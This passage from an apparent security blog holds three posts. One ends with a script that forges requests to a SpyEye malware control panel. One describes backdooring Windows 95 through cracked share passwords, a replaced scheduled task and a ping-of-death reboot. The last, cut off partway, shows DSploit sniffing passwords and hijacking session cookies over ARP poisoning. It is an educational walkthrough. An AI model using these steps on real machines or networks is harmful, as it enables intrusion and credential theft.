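}
printf("recovered key: %d\n", $key);
echo xor_decode($raw, $key), "\n";
```

<div style="text-align: justify;">
The crib only needs to be as long as it takes to make the key unique; with a single-byte key, one known plaintext byte already does it, and the remaining bytes just confirm the guess.</div>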
<div>
This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.</div>
<div>
<br /></div>
<div>
<br /></div>
<pre class="prettyprint linenums lang-python">import binascii
import requests

# XOR every byte of a bytes object with a single-byte key (SpyEye uses 219)
def xor_bytes(data, key):
    return bytes(b ^ key for b in data)

# base64 body of a captured bot request to gate.php
b64_data = "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+"
payload = xor_bytes(binascii.a2b_base64(b64_data), 219)
print("the decrypted payload is: " + payload.decode("latin-1"))
# re-encode the payload the same way the bot does and send it to the gate
params = binascii.b2a_base64(xor_bytes(payload, 219))
r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data={'data': params})
</pre>
<div>
<h3>
Moral of the story?</h3>
<div>
<br /></div>
Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.</div>
<br /></div>
<h2>
Hacking Windows 95, part 2</h2>
<div>Published 2014-05-23</div>
<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.be/2014/02/hacking-windows-95-part-1.html" target="_blank">Hacking Windows 95, part 1</a> blog post, we covered that through a nasty bug affecting Windows 95/98/ME, the share password can be guessed in no time. In this article, I'm going to try to use this vulnerability to achieve remote code execution (with the help of publicly available tools only).<br />
<br />
The first thing we can do when we have read access to the Windows directory through the share is to locate all the *.pwl files in the c:\windows directory, copy them to the machine where Cain is installed, switch to the Cracker tab, PWL files, load the pwl file, add the username based on the filename, and try to crack it. If you can't crack it, you might still try to add a .pwl file with a password you already know to the remote Windows directory. Although this is a fun post-exploitation task, it is still not remote code execution. These passwords are useless without physical access.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYUEEyFeZeqVEnb8tMzn81QmJZTWC0xtCuNV7TNUS7hOaddyUlxJETGnaa8cBOZ0xUKh1HBL2WeP-jvU1r04gRN5eegNet7EHCkYOJegpPBVKu-94-2Dhuh95XNVYzOMJUJQWVlvTEzHpi/s1600/winxp_to_hack_win95-2014-05-08-16-59-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYUEEyFeZeqVEnb8tMzn81QmJZTWC0xtCuNV7TNUS7hOaddyUlxJETGnaa8cBOZ0xUKh1HBL2WeP-jvU1r04gRN5eegNet7EHCkYOJegpPBVKu-94-2Dhuh95XNVYzOMJUJQWVlvTEzHpi/s1600/winxp_to_hack_win95-2014-05-08-16-59-10.png" height="270" width="400" /></a></div>
<br /></div>
<div style="text-align: justify;">
One might think that after having a share password and user password, it is easy to achieve remote code execution. The problem is:</div>
<ul>
<li style="text-align: justify;">there is no "at" command (only available with Windows 95 Plus!)</li>
<li style="text-align: justify;">there is no admin share</li>
<li style="text-align: justify;">there is no RPC</li>
<li style="text-align: justify;">there is no named pipes</li>
<li style="text-align: justify;">there is no remote registry</li>
<li style="text-align: justify;">there is no remote service management</li>
</ul>
<div style="text-align: justify;">
If you think about security best practices, disabling unnecessary services is always the first task you should do. Because Windows 95 lacks all of these services, it is pretty much secure!<br />
<br />
During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:<br />
<div>
<br />
<b><a href="http://www.gregthatcher.com/InternetPeriscope/">Internet periscope</a></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZwgBhcgI8QKLgzo4B5iqWavUcR_7FimVF2oQHqfZn0OrJ5b1U5ZqPNXLfe34E9QT85BN0tUFK_RQrvI1mSJ6BVZhIwT-zOlMRJerxEnrWyDQzbKD-QRGm3ifxLrdx_yEkOoJnTQlOU8j/s1600/winxp_to_hack_win95-2014-05-08-17-06-52.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZwgBhcgI8QKLgzo4B5iqWavUcR_7FimVF2oQHqfZn0OrJ5b1U5ZqPNXLfe34E9QT85BN0tUFK_RQrvI1mSJ6BVZhIwT-zOlMRJerxEnrWyDQzbKD-QRGm3ifxLrdx_yEkOoJnTQlOU8j/s1600/winxp_to_hack_win95-2014-05-08-17-06-52.png" height="178" width="320" /></a></div>
<b><br /></b>
</div>
<div>
<b><a href="http://sourceforge.net/projects/winfingerprint/">Winfingerprint</a></b><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6qwrCT1WRVmeWqdeuyNyOuArictr1thsdX0H-Io2_48ijsecPV1mBLFBc3wROh726bXJ234udNa_lmkb7mtAV_4fAzmKsBd3xkz-DYU_KylzU8nYBzikkMlBdOSBT1kioD_H7bxDIX1hW/s1600/winfingerprint.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6qwrCT1WRVmeWqdeuyNyOuArictr1thsdX0H-Io2_48ijsecPV1mBLFBc3wROh726bXJ234udNa_lmkb7mtAV_4fAzmKsBd3xkz-DYU_KylzU8nYBzikkMlBdOSBT1kioD_H7bxDIX1hW/s1600/winfingerprint.png" height="304" width="320" /></a></div>
<br /></div>
<div>
<b><a href="http://lantricks.com/download/">LanSpy</a></b><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl48HANKhfGejo_6ORGwfJxMHNL1NDwg5L9AMgn8ae41_1d4cUw6-LjNDSTIujilg3bWME3aifmXg7-Pe5pRRydWtZ8d78oeU1SKQIRE6OF8IAuFcsV8fziCf-EGHwORlEtZ1Gk58Urz6G/s1600/lanspy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl48HANKhfGejo_6ORGwfJxMHNL1NDwg5L9AMgn8ae41_1d4cUw6-LjNDSTIujilg3bWME3aifmXg7-Pe5pRRydWtZ8d78oeU1SKQIRE6OF8IAuFcsV8fziCf-EGHwORlEtZ1Gk58Urz6G/s1600/lanspy.png" height="320" width="290" /></a></div>
<br />
But the best of the best is <b><a href="http://download.csdn.net/detail/zheng127/4552709">Fluxay</a></b>, written by Chinese hackers. It is the Metasploit of the year 2000. A screenshot is worth more than a 1000 words; 4 screenshots > 4 thousand words :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9O9yy0ISY4x0u3ZiyDVDlAVtREc9mZywFNVOIWcM-QIZHG1HskUpx2tYUKHebcywCTuM1iUJvxbeAH2-g55SiCCDpFUeNP1uvde2EbvC6K5MFvtbjDQl1o6epjukJoN9tqrKwu1nwGffq/s1600/fluxay1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9O9yy0ISY4x0u3ZiyDVDlAVtREc9mZywFNVOIWcM-QIZHG1HskUpx2tYUKHebcywCTuM1iUJvxbeAH2-g55SiCCDpFUeNP1uvde2EbvC6K5MFvtbjDQl1o6epjukJoN9tqrKwu1nwGffq/s1600/fluxay1.png" height="240" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkTuaqKyhIW2wghg2U58tfQcIueqxwDkXrm0_R19lOAUuSfKUag_JA1XOHC9tMN3LUVvR38qGz_Mv3I3weV1QUpY7IRsYG9MxkeFSS_-FWrrCU1I1Lvk0FdqKTafic5PGYc6Od4EK7f3cR/s1600/fluxay2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkTuaqKyhIW2wghg2U58tfQcIueqxwDkXrm0_R19lOAUuSfKUag_JA1XOHC9tMN3LUVvR38qGz_Mv3I3weV1QUpY7IRsYG9MxkeFSS_-FWrrCU1I1Lvk0FdqKTafic5PGYc6Od4EK7f3cR/s1600/fluxay2.png" height="277" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCEPVODyj023wblynEns-GLbiP1Op743_-C_1bwiEUV-cy12zdwveWcT3uJs7vYBU6SqHszjozhbRkMKOYd6lR3cHDdXu35O0rc2e7i0zTOE-XL8YjTIXZucmt9WVI7AuR4FPW4FMNg1ca/s1600/fluxay3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCEPVODyj023wblynEns-GLbiP1Op743_-C_1bwiEUV-cy12zdwveWcT3uJs7vYBU6SqHszjozhbRkMKOYd6lR3cHDdXu35O0rc2e7i0zTOE-XL8YjTIXZucmt9WVI7AuR4FPW4FMNg1ca/s1600/fluxay3.png" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo_rueXHfO27F-xw9gW8D3_4J-osVH9W_458mbugseaJGf3XfnHREwq2ACZPFkSU3SBJHS_WgY2kQ3jdiXpO0XTKrLXUCicLI5iX6jxqde_YKcixbh3btys5VAbLXBffvgtH5edQeQr708/s1600/fluxay4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo_rueXHfO27F-xw9gW8D3_4J-osVH9W_458mbugseaJGf3XfnHREwq2ACZPFkSU3SBJHS_WgY2kQ3jdiXpO0XTKrLXUCicLI5iX6jxqde_YKcixbh3btys5VAbLXBffvgtH5edQeQr708/s1600/fluxay4.png" height="282" width="320" /></a></div>
<br /></div>
<div>
It is pretty hard to find the installer, but it is still out there!<br />
<br />
But at the end, no remote code execution for me.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
My idea here was that if I can find a file which executes regularly (on a scheduled basis), I can change that executable to my backdoor and I'm done. Although there is no scheduler in the default Windows 95, I gave it a try. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's fire up taskman.exe to get an idea what processes are running:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpmD7IzX_fN3YmNVHSOKpzll-tvY8PvLJEvOxHv03J4i8KMyZK0rQxu-Ye8ZrO9LfO4yBkHzI_lTaTnnzwaNOt8qCQt_g9zZTdZTSUCVS20OTuTtbKyC3iNH-P1pK29E_JMkRmkC_k9URh/s1600/Windows+95-2014-01-07-21-18-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpmD7IzX_fN3YmNVHSOKpzll-tvY8PvLJEvOxHv03J4i8KMyZK0rQxu-Ye8ZrO9LfO4yBkHzI_lTaTnnzwaNOt8qCQt_g9zZTdZTSUCVS20OTuTtbKyC3iNH-P1pK29E_JMkRmkC_k9URh/s1600/Windows+95-2014-01-07-21-18-47.png" height="300" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Looks like we need a more powerful tool here, namely Process Explorer. Let's try to download this from oldapps.com:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgScOxM0T1emj11AETmIBkeqg8BXIpTT8j5JNfsnfaVkWAktn81wxZeM7tbLeSt7T7bd6T9kJDjNxxQQi3FXUfpehzDkob_LM2z59PFMAn19XNsvLjTfa_kFZnkGu4VGH4wwrXcUsetxEOd/s1600/Windows+95-2014-02-02-12-12-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgScOxM0T1emj11AETmIBkeqg8BXIpTT8j5JNfsnfaVkWAktn81wxZeM7tbLeSt7T7bd6T9kJDjNxxQQi3FXUfpehzDkob_LM2z59PFMAn19XNsvLjTfa_kFZnkGu4VGH4wwrXcUsetxEOd/s1600/Windows+95-2014-02-02-12-12-30.png" height="300" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
LOL, IE3 hangs, it can't render the page. Copying files to the Win95 VM is not that simple either, because there are no shared folders in a Win95 VM. And you can't use pendrives, as Win95 can't handle USB (at least the retail version). After downloading the application with a newer browser from oldapps, let's start Process Explorer on the test Windows 95.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilyY50KN2VIG_qwqT_rBw2XgM8XQYVLE41GZVxXsF3XYy2qQLM8qt72qXdHWLe6-QOjMuZl2uIKyQS1H2-6kEAwrWOkjPvMB7hjyRw9EYGwAfG5U-SxnFLOg0tKjQyW_rK2DtjYpYd53VY/s1600/Windows+95-2014-01-07-21-32-15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilyY50KN2VIG_qwqT_rBw2XgM8XQYVLE41GZVxXsF3XYy2qQLM8qt72qXdHWLe6-QOjMuZl2uIKyQS1H2-6kEAwrWOkjPvMB7hjyRw9EYGwAfG5U-SxnFLOg0tKjQyW_rK2DtjYpYd53VY/s1600/Windows+95-2014-01-07-21-32-15.png" height="300" width="400" /></a></div>
<div style="text-align: justify;">
<br />
Don't try to download the Winsock 2 patch from the official MS site, it is not there anymore, but you can download it from <a href="ftp://ftp.ema.fr/pub/pc/windows/securite/">other sites</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now let's look at the processes running:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwJ3eNXx-MMCwzF2h2fn_o4h-b7u5-HbdNbwUKugV3HJiGDTG1ZExjx7N9GhRBlPImlOeKs3RC9wuYne06VssWoVjj8gEtCoDWrMrei0GO1KIi5lRnQOGgtO30gBqQd-qeK7_ZOniqbez/s1600/procexp_running.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwJ3eNXx-MMCwzF2h2fn_o4h-b7u5-HbdNbwUKugV3HJiGDTG1ZExjx7N9GhRBlPImlOeKs3RC9wuYne06VssWoVjj8gEtCoDWrMrei0GO1KIi5lRnQOGgtO30gBqQd-qeK7_ZOniqbez/s1600/procexp_running.png" height="300" width="400" /></a></div>
<br />
After staring at it for minutes, it turned out to be constant; no new processes appeared.<br />
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...<br />
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbq2kweWdG0tvnMCw_bGHA3gqX_u9Z8NGOeuMQXjNVGLPE2L_i3Z72Y699KpWk-HFV3aGhJyTJ-T4w3kmCm6_OTw1q63mF-ehRIr9QUacwKPdj_i02r9l3FGdY63jz5ah_JDCgrgvX0r91/s1600/procexp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbq2kweWdG0tvnMCw_bGHA3gqX_u9Z8NGOeuMQXjNVGLPE2L_i3Z72Y699KpWk-HFV3aGhJyTJ-T4w3kmCm6_OTw1q63mF-ehRIr9QUacwKPdj_i02r9l3FGdY63jz5ah_JDCgrgvX0r91/s1600/procexp2.png" height="297" width="400" /></a></div>
<br /></div>
<div style="text-align: justify;">
My current Win7 has 1181 threads and 84 processes running, no wonder it is slow as hell :)<br />
<br /></div>
<div style="text-align: justify;">
We have at least the following options:</div>
<ol>
<li style="text-align: justify;">You are lucky and not plain Windows 95 is installed, but Windows 95 Plus! The main difference here is that Windows 95 Plus! has a built-in scheduler, in particular the "at" command. Just overwrite a file which is scheduled for execution, and wait. Mission accomplished!</li>
<li style="text-align: justify;">Ping of death - you can crash the machine (no BSOD, just a crash) with oversized (over 65535 bytes) ICMP ping packets, and wait for someone to reboot it. Just don't forget to put your backdoor on the share and add it to autoexec.bat before crashing it.</li>
<li style="text-align: justify;">If your target is a plain Windows 95, I believe you are out of luck. No at command, no named pipes, no admin share, nothing. Maybe you can try to fuzz ports 137, 138 and 139, and write an exploit for those. Maybe even Ping of Death is exploitable?</li>
</ol>
<div style="text-align: justify;">
Let's do the first option, and hack Windows 95 plus!</div>
<div style="text-align: justify;">
Look at the cool features we have by installing Win95 Plus!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqw7Sk-Yt2dT1ucN-l67yKJMXoqQaWncxS4uy_wEHeOr2TU6qF8c5MowfxF0HxMPariMzUZ6KEYcVEAMDJ0-m1RQLm1ekEtbcJJA7BWhoAIbzOl2D1DrXJzy1WggCDmjMb4TKdxPDTuAA1/s1600/win95plus_features.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqw7Sk-Yt2dT1ucN-l67yKJMXoqQaWncxS4uy_wEHeOr2TU6qF8c5MowfxF0HxMPariMzUZ6KEYcVEAMDJ0-m1RQLm1ekEtbcJJA7BWhoAIbzOl2D1DrXJzy1WggCDmjMb4TKdxPDTuAA1/s1600/win95plus_features.png" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Cool new boot splash screen!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkJSTvISyHK8XejQomkxaqKxvZCLwn6zYjnlDSvyil5lOsR6gt3K5H3R2Ua225ZRGoE7TObvEGOHSjraDaLMfPZWOT7j-wu53j6k7QjgfccABXRQeiIIZ3j9GM8QHns8M9Pystec76Vyo/s1600/win95_plus_boot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkJSTvISyHK8XejQomkxaqKxvZCLwn6zYjnlDSvyil5lOsR6gt3K5H3R2Ua225ZRGoE7TObvEGOHSjraDaLMfPZWOT7j-wu53j6k7QjgfccABXRQeiIIZ3j9GM8QHns8M9Pystec76Vyo/s1600/win95_plus_boot.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But our main interest is the new, scheduled tasks!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgROp-GmoOPrpQqjQZCHTLjIibLadlCV_JANJdqbaqtcevEUuZF2FvymmvAvOegFZbwpb1xD0mlW6VMLpgkr9Vt8zjLPjaQFtbbjhCeBKLfB9WEyLCn9CtagRI5MrI5b1oS3ZlaOmdn6CTT/s1600/win95_scheduled_tasks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgROp-GmoOPrpQqjQZCHTLjIibLadlCV_JANJdqbaqtcevEUuZF2FvymmvAvOegFZbwpb1xD0mlW6VMLpgkr9Vt8zjLPjaQFtbbjhCeBKLfB9WEyLCn9CtagRI5MrI5b1oS3ZlaOmdn6CTT/s1600/win95_scheduled_tasks.png" height="240" width="320" /></a></div>
<br />
Now we can replace diskalm.exe with our backdoor executable, and wait at most one hour for it to be scheduled.<br />
<br />
Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedback on my previous tutorialz, it turned out I'm way too old and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the following so my vidz won't suck anymore:<br />
<ul>
<li>use cool black windows theme</li>
<li>put meaningless performance monitor gadgets on the sidebar</li>
<li>use a cool background, something related with hacking and skullz</li>
<li>do as many opsec fails as possible</li>
<li>instead of captions, use notepad with spelling errorz</li>
<li>there is only one rule of metal: <a href="http://www.youtube.com/watch?v=Hreqn9j3PHI">Play it fuckin' loud!!!!</a></li>
</ul>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="480" src="//www.youtube-nocookie.com/embed/x5Yt5UjLR1w?rel=0" width="640"></iframe>
</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-14260577507214285812014-04-29T23:56:00.003+02:002019-10-08T15:55:47.488+02:00DSploit<div style="text-align: justify;">
<h3 style="text-align: justify;">
DSploit</h3>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
After playing with the applications installed on the <a href="http://jumpespjump.blogspot.com/2014/04/wifi-hacking-on-tablets.html">Pwn Pad</a>, I found that the most important application (at least for me) was missing from the pre-installed apps. Namely, <a href="http://dsploit.net/">DSploit</a>. Although DSploit has tons of features, I really liked the multiprotocol password sniffing (same as dsniff) and the session hijacking functionality.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The DSploit APK in the Play Store was not working for me, but the latest nightly on http://dsploit.net worked like a charm.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Most features require only that you and your target use the same WiFi network; it can be Open, WEP, or WPA/WPA2 Personal. On all of these networks DSploit will sniff the passwords, because it uses <a href="http://dsploit.net/2013/03/22/dsploit-internals-and-arp-cache-poisoning/">active attacks</a> (ARP cache poisoning) rather than passive sniffing. E.g. a lot of email clients still use IMAP with clear text passwords, some webmails do the same, etc. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
First, DSploit lists the AP and the known devices on the network. In this case, I chose one victim client.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTNuFhXRBHlg_dO9cVPurTW17j4bRrkVrc26BUuGzbYdx7yFlHd4I0XFMi9W4593I-ATd3-HQB1rsi-8k9y74LYTH9FTRuGF0NuwAUOJzGd30l5LOJ2xR9dZz3Dhww_82zQgWAA0T6uxQ9/s1600/dsploit_01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTNuFhXRBHlg_dO9cVPurTW17j4bRrkVrc26BUuGzbYdx7yFlHd4I0XFMi9W4593I-ATd3-HQB1rsi-8k9y74LYTH9FTRuGF0NuwAUOJzGd30l5LOJ2xR9dZz3Dhww_82zQgWAA0T6uxQ9/s1600/dsploit_01.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the following submenu, there are tons of options, but the best features are in the MITM section. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbMoXPVLHUVWnPoaPOLx4EmOT2NqhxyR0a-1jMD-s-wmWitONK63YdS8w1VWHXPumV0LLK3ozfbBeYXVNfg1jlRd9EkPW57pBukin58oKuTps-R-etuKtQIQYfWAD_nlmnFJA5GMpfihb/s1600/dsploit_02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbMoXPVLHUVWnPoaPOLx4EmOT2NqhxyR0a-1jMD-s-wmWitONK63YdS8w1VWHXPumV0LLK3ozfbBeYXVNfg1jlRd9EkPW57pBukin58oKuTps-R-etuKtQIQYfWAD_nlmnFJA5GMpfihb/s1600/dsploit_02.png" width="251" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">Stealthiness warning: in some cases, I received the following popup on the victim's Windows machine:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2KyJZuUJB9ptSkQuOxT4GR371jfXAEZVwa57_7NGSWDxRcxuN_L5oeQVA5b80YAN1rOH0lhaYu84l2NaI5bx2B6nK7esQU_pN3rJNRfjfox2WTSqPHwSJ05ye6oOXcLA8xbLB4cbORGy/s1600/attack1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2KyJZuUJB9ptSkQuOxT4GR371jfXAEZVwa57_7NGSWDxRcxuN_L5oeQVA5b80YAN1rOH0lhaYu84l2NaI5bx2B6nK7esQU_pN3rJNRfjfox2WTSqPHwSJ05ye6oOXcLA8xbLB4cbORGy/s1600/attack1.png" width="320" /></a></div>
<div style="text-align: justify;">
<br />
This is what we have under the MITM submenu:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2oPClAtkObUo9VynKrnOVPf6Gqgb_A47kTbzPid_K-pIdlpXw5zWm_PGGPHHQ7IhjoYrA61E5mpmOQDLwVXM70jKqzLlETm8eYhz_EGJlaQmnoOOQH6OM5JrP_yHNWDeYgqGTPZ9BDGG1/s1600/dsploit_03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2oPClAtkObUo9VynKrnOVPf6Gqgb_A47kTbzPid_K-pIdlpXw5zWm_PGGPHHQ7IhjoYrA61E5mpmOQDLwVXM70jKqzLlETm8eYhz_EGJlaQmnoOOQH6OM5JrP_yHNWDeYgqGTPZ9BDGG1/s1600/dsploit_03.png" width="302" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3>
Password sniffing</h3>
<div style="text-align: justify;">
For example, let's start with the <b>Password Sniffer</b>. It does the same as EvilAP plus DSniff in my previous post, with the same results for the popular Hungarian webmail when the default secure login checkbox is left turned off. Don't forget, this is not an Open WiFi network, but one with WPA2 protection!<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyDLLzVpmpMVzVuEJNZ7EpP7IrLmE9asUqUIyCLMXO53CC4YSs1O3FfjpebI0RIMMjdQ0aGrOrd1t-iwoRmR4tSNYDkr0AixSshyphenhyphenG0rz9PzwI2aCGmIYtyepcfh5FFFhc1iIUruIW0ExIM/s1600/freemail_password.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyDLLzVpmpMVzVuEJNZ7EpP7IrLmE9asUqUIyCLMXO53CC4YSs1O3FfjpebI0RIMMjdQ0aGrOrd1t-iwoRmR4tSNYDkr0AixSshyphenhyphenG0rz9PzwI2aCGmIYtyepcfh5FFFhc1iIUruIW0ExIM/s1600/freemail_password.png" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3>
Session hijack</h3>
<div style="text-align: justify;">
Now let's assume that the victim is very security-aware and checks the secure login checkbox. Another case is that the victim already logged in, long before we started the attack. The <b>session hijacking</b> function is similar to the <a href="http://codebutler.com/firesheep/">Firesheep</a> tool, but it works with every website where the session cookies are sent in clear text, without needing any site-specific support.<br />
<br /></div>
<div style="text-align: justify;">
In a session hijacking attack (also called "sidejacking"), after the victim's browser sends the authentication cookies in clear text, DSploit copies these cookies into its own browser and opens the website with the same cookies, which results in a successful login most of the time. Let's see session hijacking in action!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Here, we can see that the session cookies have been sniffed from the air:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
